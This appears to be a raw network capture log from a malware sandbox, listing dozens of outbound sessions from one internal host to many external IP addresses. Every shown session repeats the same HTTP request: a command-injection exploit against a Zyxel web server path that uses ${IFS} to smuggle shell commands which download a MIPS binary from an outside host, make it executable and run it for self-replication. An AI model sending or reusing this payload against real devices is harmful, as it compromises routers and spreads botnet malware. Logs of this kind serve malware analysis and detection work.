                                            Jan 14, 2024 15:50:30.269383907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1875192.168.2.2338110207.241.201.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269397974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1876192.168.2.2360170120.227.18.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269423962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1877192.168.2.234621424.228.19.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269469976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1878192.168.2.2350832169.86.139.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269515038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1879192.168.2.2355650190.3.16.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269555092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1880192.168.2.234694051.112.71.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269561052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1881192.168.2.2346290219.79.96.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269586086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1882192.168.2.234338072.190.111.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269613981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1883192.168.2.2340774115.116.201.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269664049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1884192.168.2.2356676191.42.212.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269676924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1885192.168.2.233818238.125.18.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269717932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1886192.168.2.2353366106.233.102.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269753933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1887192.168.2.233631414.152.245.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269779921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1888192.168.2.235509425.214.199.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269819021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1889192.168.2.234717235.248.228.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269853115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1890192.168.2.2338476128.226.214.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269876957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1891192.168.2.2351554201.233.22.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.269893885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1892192.168.2.235531491.7.127.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264086962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1893192.168.2.2351340113.101.220.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264224052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1894192.168.2.2341570105.49.101.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264241934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1895192.168.2.2353024125.51.15.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264266014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1896192.168.2.235943244.124.216.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264271975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1897192.168.2.235319091.193.113.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264333963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1898192.168.2.233481667.227.159.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264348984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1899192.168.2.2342956109.15.63.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264374018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1900192.168.2.234029851.220.189.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264431000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1901192.168.2.2336402114.236.235.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264476061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1902192.168.2.2344188112.241.44.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264496088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1903192.168.2.2333758141.72.201.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264540911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1904192.168.2.2333502112.190.201.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264555931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1905192.168.2.2345904187.16.145.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264590979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1906192.168.2.2333266106.5.116.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264642000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1907192.168.2.2347744164.56.190.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264677048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1908192.168.2.2337132129.171.117.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264708042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1909192.168.2.2353148129.114.234.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264723063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1910192.168.2.234643820.157.19.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264749050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1911192.168.2.234350688.5.239.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264800072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1912192.168.2.2359382116.87.149.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264822960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1913192.168.2.2355474104.111.224.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264828920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1914192.168.2.233993680.146.181.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264834881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1915192.168.2.235564848.228.73.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264875889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1916192.168.2.235210842.221.25.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264914036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1917192.168.2.2351978113.105.202.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264933109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1918192.168.2.2345498152.79.31.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264974117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1919192.168.2.233713012.251.18.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.264987946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1920192.168.2.235773637.205.28.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265048981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1921192.168.2.234738097.209.17.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265069008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1922192.168.2.2354100121.26.254.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265089035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1923192.168.2.235478845.151.58.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265120983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1924192.168.2.2358452149.173.245.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265145063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1925192.168.2.2348606173.253.232.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265166998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1926192.168.2.2356332120.234.247.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265208960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1927192.168.2.2343094115.133.206.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265212059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1928192.168.2.2335072207.238.58.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265244007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1929192.168.2.2338378201.40.109.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265283108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1930192.168.2.2352510201.11.221.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265311956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1931192.168.2.2352164198.64.201.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265341043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1932192.168.2.235667068.9.144.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265374899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1933192.168.2.2358252108.28.129.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265408039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1934192.168.2.2351638201.234.241.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265436888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1935192.168.2.233520623.176.24.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265467882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1936192.168.2.2344756126.141.42.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265496969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1937192.168.2.235110235.155.219.71443
                                            TimestampBytes transferredDirectionData
